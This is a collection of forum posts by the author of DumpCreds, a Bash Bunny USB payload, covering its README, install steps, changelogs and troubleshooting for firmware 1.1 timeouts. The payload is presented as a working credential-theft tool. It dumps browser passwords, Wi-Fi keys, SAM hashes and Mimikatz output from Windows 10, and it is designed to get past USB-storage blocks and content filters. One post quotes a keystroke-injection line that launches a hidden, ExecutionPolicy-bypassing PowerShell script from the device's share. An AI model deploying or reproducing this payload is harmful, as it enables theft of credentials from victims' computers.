[Filesystem issues]

Hello, 

At the moment I'm writing an extension which give some debug information during a payload run.

The function START_DEBUG "tail " the /var/log/syslog to /tmp/log.txt (I won't create a extra file because syslog give al lot of more useful information in background.)
During payload run I can output some information to syslog  with logger
With STOP_DEBUG I stop the "tail",  test if the /dev/nandf is mounted. If so I Copy /tmp/log.txt to /root/disk/loot. /If not I mount the /dev/nandf to /root/udisk, copy the file, do a sync and unmount the /dev/nandf.

 Now the Problem. It happens often that when I look in the loot file there is no log file and the FS is corrupted. This happens even I do a sync; sleep 1; sync after copy the file and befor unmounting the FS
It seems tha the FS is not unmunted correctly. Sometimes the dirty bit is set.

 

Have somebody any idea?

 

  

 

 

 

payload.txt

debug.sh

[Bash Bunny Firmware 1.1 - Payload Timeout [Solved]]

With a Hi Sebkinne,

Nice, can't wait for 1.2. 

I think the idea with a payload timeout is not so bad.  . With a special LED state we know if it make sense to wait for a payload to finish or not. 

 

[[Payload] DumpCreds 2.1 New Version]

15 hours ago, b0N3z said:

why doesnt it save the loot to the loot directory but instead to the payload folder that it runs from.  Is this for a faster payload or to get rid of storage mode during the payload?

Plz. can go to DEBUG mode (create a file named DEBUG in the payload folder. look at the file in the /loot/DumpCred_2.1/log.txt 
If there is no log..txt take a look at /tmp/log.txt. If there is something like bunny.service timeout or bunny.service failed you propably run into a timeout. 

This is a Bunny issue in Firmware 1.1 and will bes solved in Fw 1.2 

Look there .....

 

 

 

 

[DUCKY_LANG problems]

hi

copy all the *.json files to the language folder of the bunny flash storage. After them boot into arming mode. During boot all language files will be copied to an internal folder. I think it was /usr/local/lib/language. (At the moment i have no bunny to look at)

[[Payload] DumpCreds 2.1 New Version]

you are right. It's to get rid of team storage mode. I don't  know any company who allows Usb storage. the sun ports are almost blocked.

so I store the loot to the payload folder and copy it during cleanup to the /loot folder

[deb files?]

For Responder you don't need any deb Files. Copy the Responder Folder from Tools_Installer payload to <flash_root>\tools end reboot bunny in arming mode. 
During reboot the bunny move the file to /tools ( <root_of_bunny_linx>/tools (previously known as /pentest) .

You need only a deb file if you have some post- or preinstall scripts running after or befor copy the files.
 

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

DumpCreds_2.1 New Version

Changelog

• Complete new payload.txt code for BashBunny 1.1
• Added a lot of debug code into the payload
  For Debugging create a File "DEBUG" to payload Folder. You got the debug log in \loot\Dumpcreds_2.1
• Impacket.deb included for easy impacket installation
• Some Ducky languages included (from DuckyInstall Payload)

 

[[Payload] DumpCreds 2.1 New Version]

 

DumpCreds 2.1

• Author: QDBA
• Version: Version 2.1.0 Build 1004
• Target: Windows 10

Description

** !!!!! works only at Bash Bunny with FW 1.1 !!!!! **

Dumps the usernames & plaintext passwords from

• Browsers (Crome, IE, FireFox)
• Wifi
• SAM Hashes (only if AdminMode=True)
• Mimimk@tz Dump (only if AdminMode=True)
• Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)

without

• Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
• Internet connection (becaus Firewall ContentFilter Blocks the download sites)

Problems

• if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded.
• If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times)
• If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out. If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue)

Debug

If you want some debug information, create a file with name "DEBUG" in the payload folder you got the debug information in \loot\DumpCred_2.1\log.txt Folder

Configuration

None needed.

Requirements

impacket  - install it form https://github.com/qdba/MyBashBunny/tree/master/tools

Download

https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds

Install

1. Put Bash Bunny in arming mode

2. Copy All Folders into the root of Bunny Flash Drive Mandatory * payloads/library/DumpCreds_2.1 --> the payload Files * payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload * tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed) Not neccessary * docs --> this doc file * languages --> languauge files for DUCKY_LANG

3. eject Bash Bunny safely!!

4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed )

5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2

6. eject Bash Bunny safely

7. move switch in right position

8. plugin Bash Bunny and have fun....! :-)

STATUS

LED	Status
Magenta Solid	Setup
Red slow blink	Impacket not found
Red fast blink	Target did not acquire IP address
Yellow single blink	Initialization
Yellow double blink	HID Stage
Yellow triple blink	Wait for IP coming up
Yellow quad blink	Wait for Handshake (SMBServer Coming up)
Yellow very fast blink	Powershell scripts running
White fast blink	Cleanup, copy Files to /loot
Green	Finished
-----------------------	--------------------------------------------

Discussion

https://forums.hak5.org/index.php?/topic/40582-payload-drumpcreds-20-wo-internet-wo-usb-storage

Credits

to...... 

https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1

Changelog

• Complete new payload.txt code for BashBunny 1.1
• Added a lot of debug code into the payload
  For Debugging create a File "DEBUG" to payload Folder. You got the debug log in \loot\Dumpcreds_2.1
• Impacket.deb included for easy impacket installation
• Some Ducky languages included (from DuckyInstall Payload)

 

 

[[PAYLOAD_UPDATE] QuickCreds]

Can be a runtime problem. With default setting a payload does not run longer than 1min 30s since.(measured since plug in the bunny)

After 1min 30 every payload stops working.

Check your /var/log/syslog if there is an entry like :

bunny.service start operation timed out. Terminating

Failed to start bunny.service

[Bash Bunny Firmware 1.1 - Payload Timeout [Solved]]

I'm still running in the payload timeout after 1 Minute.

So I did some investigation about it.  
I made the attached  payload.txt for testing.
I put the command logger "#### Start Test payload #### at the beginning of the payload and   
logger "#### End Test payload ####" at the end. So I can examine the syslog what happens during ten payload run.

After approx. 1:30 min bunny.service is running into a timeout

.........
Apr  6 09:56:52 bunny logger: #### Loop Test payload ####
Apr  6 09:56:54 bunny logger: #### Loop Test payload ####
Apr  6 09:56:56 bunny logger: #### Loop Test payload ####
Apr  6 09:56:58 bunny systemd[1]: bunny.service start operation timed out. Terminating.
Apr  6 09:56:58 bunny systemd[1]: Failed to start bunny.service.
Apr  6 09:56:58 bunny systemd[1]: Unit bunny.service entered failed state.
Apr  6 09:56:58 bunny systemd[1]: Starting Multi-User System.
Apr  6 09:56:58 bunny systemd[1]: Reached target Multi-User System.
Apr  6 09:56:59 bunny systemd[1]: Startup finished in 2.366s (kernel) + 1min 34.343s (userspace) = 1min 36.710s.

 

The result of the command systemctl show bunny.service |grep Timeout is

TimeoutStartUSec=1min 30s
TimeoutStopUSec=1min 30s
JobTimeoutUSec=0
 

Guess this is the reason for the payload timeout. 
Can anybody confirm this?

I willl do more investigations

syslog

payload.txt

______________________________________________________________________________________________________________________

OK got it.....

I insert the value

TimeoutSec=5min

under the [Service] section of file /lib/systemd/system/bunny.service 
Now it works with a timeout of 5 min. (see attached syslog.solved_5min_Timeout)

Be carefully, I'm not responsible for any damage of the bunny :-)

@Darren Kitchen @Sebkinne If you agree (because its part of Firmware) I can make a payload who will patch this.

syslog.solved_5min_Timeout

[[RELEASE] Bash Bunny 1.1]

There is a Error ( or is it a Feature ). 

There is a timeout approx. 1 min after this timeout the payload stops.

Run attached payload and look at /log.txt 

The payload stops after a minute

 

payload.txt

 

------------------------------------[Solved] ------------------------------------------------

Look there --- Gucksch du hier :-)

 

[[RELEASE] Bash Bunny 1.1]

Impacket Tools impacket_0.9.15_1.deb

https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/tools

Put the deb file into <root>\tools folder - remove Bunny safely - reinsert in arming mode.

It will be installed to /tools/impacket.

[[RELEASE] Bash Bunny 1.1]

Searching for Language FIles here they are. Exportet from DuckInstall

https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/languages

Put it into <root>\Language folder - remove Bunny safely - reinsert in arming mode

[[RELEASE] Bash Bunny 1.1]

Very nice!!  Now let us rewrite some payloads ;-)

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

7 minutes ago, Altao said:

Hi i use DumpCreds 2.0.2 Build 1003 

I tried your delay still the same problem.

i see -.+.!

wifi-creds.....

and the rest

and at last very short a red sript part but too short.

Greetings

 

 

OK helps a lot. So the handshake Ting works fine.

Now the error message would be helpfull. On very fast fanishing error messages I do a trick. I make a video with the smartphone and forward slow manually until the error messages is seen.  

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

16 minutes ago, Altao said:

Hi can you post a working smbserver.py i tried nearly everything a Firmware reset your command the slow purple blink is still the problem

i can connect to \\172.16.64.1\e

if i run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works

if i do ps -ef |grep smb

root       693     1  3 16:00 ?        00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
root      1393   967  0 16:06 pts/0    00:00:00 grep smb

and i have a german keyboard

what my mistake

Greetings

Are you using Version 2.0.2
Is there an UAC Prompt or a Credential prompt?

Guess there is a timing Problem. So the main.ps1 script will not start. 

LED R G
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500    <<<<<<<<<<<<<<<<<< Increment to 1500 for testing
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
Q DELAY 1000
Q ENTER
 

Does the main.ps1 script fire up right. Can you see the command in Console?

Take care that no other Windows is open on the screen. Works best on pure Desktop.

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

1 hour ago, Hectortxz said:

I Changed The Payload For The US And I Pinged My IP To 172.16.64.1 And It Came Back Good. It Just Doesn't Pass The Slow Purple Blink.

Can you connect to \\172.16.64.1\e from explorer?

Is the smbserver.py running ( ssh to Bunny and do a ps -ef |grep smb ) If not see my post above. there is an error in the Impacket installed by tools_installer

 

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

After a Firmware reset this afternoon, I run in trouble with smbserver.py. He didn't start. The Purple LED blinks slow.

Affter some tests I realized that afer run of the tools_installer the things was fine installed, but smbserver.py had ^M at the end of every line.
I removed it in vi with :1,$s/<CTRL-v><CTRL-M>//g

or wth the commands

------------------------------------------------

cd /pentest/impacket/examples

cp smbserver.py smbserver.py.sik

cat smbserver.py.sik | sed 's/\r$//g' >smbserver.py

-----------------------------------------------------------

Now it works again.

 

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

3 hours ago, Hectortxz said:

Its A Slow Blink. I Think Its My IP I Set It To 172.16.64.1 And 255-255-255-0 But It'll Turn Red When I Try The Payload, But If My Computer Tries To Automatically Get The IP It Blinks A Slow Purple For 5 Minutes

If you set the IP manually, The var TARGET_IP will not be set by bunny_helpers.sh script. So the check if there is a target IP fails and it blinks red. I'm working at a extended version for bunny_helpers.sh. Its not an Error of payload. 

If the LED blinks slow Purple the payload is waiting for smbserver and the handshake. Is a direct connection with explorer to \\172.16.64.1\e working.

If yes... does it work when you start the script main.ps1 manually ( enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell.

Be sure you have the latest Files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.  

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

9 hours ago, illwill said:

are your chrome results truncated ?

In Version 2.0.2 it works. In older versions they are truncated.

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

36 minutes ago, illwill said:

i havent tested yours but with chromecreds i had an issue with it truncating the urls with... if they were too long. this is how i solved it

Get-ChromeCreds | ft UserURL, Password -AutoSize | Out-File $LOOTDIR\Chrome.txt -width 250

 

Thank you for the information. But it didn't work for me, because I start every process in its own powershell environment with start-job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)

 

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

New Version 2.0.2 

Changelog: 

• Paralellize Powersploit script, so the payload ist faster.
• Universal Payload. The payload works no matter if there is a UAC prompt or a credentials prompt.. There is no kind of exploitation. You will not get admin rights if you haven't it before. But without admin rights WifiDump, BrowserDump, Computerinformation works fine. Only for Hashdump and M1m1k@tz you ned admin rights.

Install:  

Copy all files to your switch directory. Don't forget the PS Folder. 

Downlod: 

See first Post

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

3 hours ago, Decoy said:

I think you might need to update the main GitHub link on your original post.

Thanks..... Done.....

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

New Version 2.0.1

Added:

Gather Computerinformation (Hardware, Software, Hotfixes, OS Informatio, OS ProductKey, Userlist...)

https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0

 

 

[[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )]

15 hours ago, jafahulo said:

python /pentest/impacket/examples/smbserver.py e $SWITCHDIR &

Yes thats the original call of smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case.

There are some timing problems in an older payload. I fixed in a later version. Guess you have an old one . sorry about it. 

But anyway fine that you like the payload.